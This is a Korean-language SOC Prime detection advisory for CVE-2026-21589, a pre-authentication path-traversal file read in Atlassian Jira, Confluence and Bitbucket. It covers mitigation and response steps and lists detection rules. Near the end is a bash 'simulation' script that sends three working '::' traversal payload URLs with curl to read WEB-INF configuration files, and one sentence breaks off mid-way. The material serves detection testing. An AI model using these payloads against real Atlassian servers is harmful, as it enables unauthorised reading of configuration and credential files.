SOC Prime Bias: Critical

08 Oct 2026 06:26 UTC

CVE-2026-21589: Atlassian Jira 및 Confluence 사전 인증 파일 읽기 취약점

Author Photo
SOC Prime Team linkedin icon 팔로우
CVE-2026-21589: Atlassian Jira 및 Confluence 사전 인증 파일 읽기 취약점
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

CVE-2026-21589 사전 인증 임의 파일 읽기 취약성은 Jira, Confluence, Bitbucket을 포함한 여러 Atlassian 제품에 영향을 미칩니다. 공격자는 경로 조작 취약점을 악용하여 :: 구분자를 통해 애플리케이션 웹 루트 내의 민감한 파일에 접근할 수 있습니다. 성공적인 악용은 평문으로 된 Atlassian Crowd 자격 증명을 노출시킬 수 있으며, 이는 신원 관리 시스템의 관리자를 위험에 빠뜨릴 수 있습니다.

조사

연구원은 atlassian-plugins-webresource JAR에서 취약성과 패치된 릴리스를 비교하여 분석했습니다. 특정 함수가 이중 콜론을 슬래시로 변환하여 경로 탐색이 가능하게 한다는 것을 발견했습니다. 마지막에 슬래시가 있는 특정 리소스 플러그인을 대상으로 함으로써 연구원들은 WEB-INF/web.xml and crowd.properties.

완화

Atlassian은 모든 영향을 받는 제품에 대한 보안 자문 및 수정 릴리스를 발표했습니다. 조직은 Bitbucket 10.5.1, Confluence 10.2.19, Jira 11.3.12와 같은 권장 수정 버전으로 업그레이드해야 합니다. 이중 콜론, 인코딩된 문자 및 의심스러운 리소스 요청과 관련된 경로 탐색 패턴을 탐지할 수 있는 WAF 규칙을 배포하면 추가 보호를 제공할 수 있습니다.

대응

URL에서 :: 에 대한 의심스러운 경로 탐색 시도가 탐지되면, 사고 대응자는 즉시 표적이 된 Atlassian 인스턴스를 식별하고 격리해야 합니다. 무단 계정 생성, 권한 상승 또는 다른 비정상적 활동에 대해 Atlassian Crowd를 검토하세요. WEB-INF 리소스를 대상으로 하는 요청을 감사하고 구성 파일을 통해 잠재적으로 노출된 자격 증명은 교체하세요. crowd.properties.

공격 흐름

이 부분은 아직 업데이트 중입니다.

탐지

관리자에게 추가된 가능성 있는 Jira 사용자 (웹 서버 통해)

SOC Prime 팀
2026년 10월 07일

생성된 가능성 있는 Jira 사용자 (웹 서버 통해)

SOC Prime 팀
2026년 10월 07일

가능성 있는 CVE-2026-21589 (Atlassian Jira, Confluence, BitBucket 사전 인증 임의 파일 읽기) 악용 시도 (웹 서버 통해)

SOC Prime 팀
2026년 10월 07일

경로 탐색을 통한 Atlassian 제품 임의 파일 읽기 [웹 서버]

SOC Prime AI 규칙
2026년 10월 07일

시뮬레이션 실행

  • 공격 내러티브 & 명령: 공격자는 Atlassian 인스턴스를 의심하며 정찰을 수행하고 있습니다. 그들은 CVE-2026-21589에 대한 알려진 악용 패턴을 사용하고 있으며, 이중 콜론 (::)를 사용하여 웹 인터페이스를 통해 파일 시스템을 탐색하는 특정 우회기법을 활용하고 있습니다. 목표는 web.xml 을 탈취하여 내부 애플리케이션 구조를 파악하고 추가 평면 이동을 위한 자격 증명을 수집하는 것입니다.

  • 회귀 테스트 스크립트:

    #!/bin/bash
    # Atlassian 경로 탐색 탐지 규칙을 유발하는 시뮬레이션 스크립트
    
    TARGET_URL="http://localhost"
    
    echo "[+] 시뮬레이션 시작: Atlassian 경로 탐색"
    
    echo "[*] 페이로드 1 시도 중: Jira web.xml 탐색..."
    curl -s -I "$TARGET_URL/download/resources/jira.webresources:color-picker-popup/images/..::..::..::..::..:WEB-INF::web.xml"
    
    echo "[*] 페이로드 2 시도 중: Confluence web.xml 탐색..."
    curl -s -I "$TARGET_URL/s/1/_/download/resources/com.atlassian.confluence.plugins.dashboard-actions/images/..::..::..::..::..::..::..:WEB-INF::web.xml"
    
    echo "[*] 페이로드 3 시도 중: Bitbucket urlrewrite.xml 탐색..."
    curl -s -I "$TARGET_URL/s/1.0/_/download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..::..::..::..::..:WEB-INF::urlrewrite.xml"
    
    echo "[+] 시뮬레이션 완료. SIEM에서 알림을 확인하세요."
  • 정리 명령:

    # 시스템에 영구적인 변경 사항은 없으므로, 정리가 필요하지 않습니다.
    echo "[+] 정리 불필요. 시뮬레이션은 비파괴적이었습니다."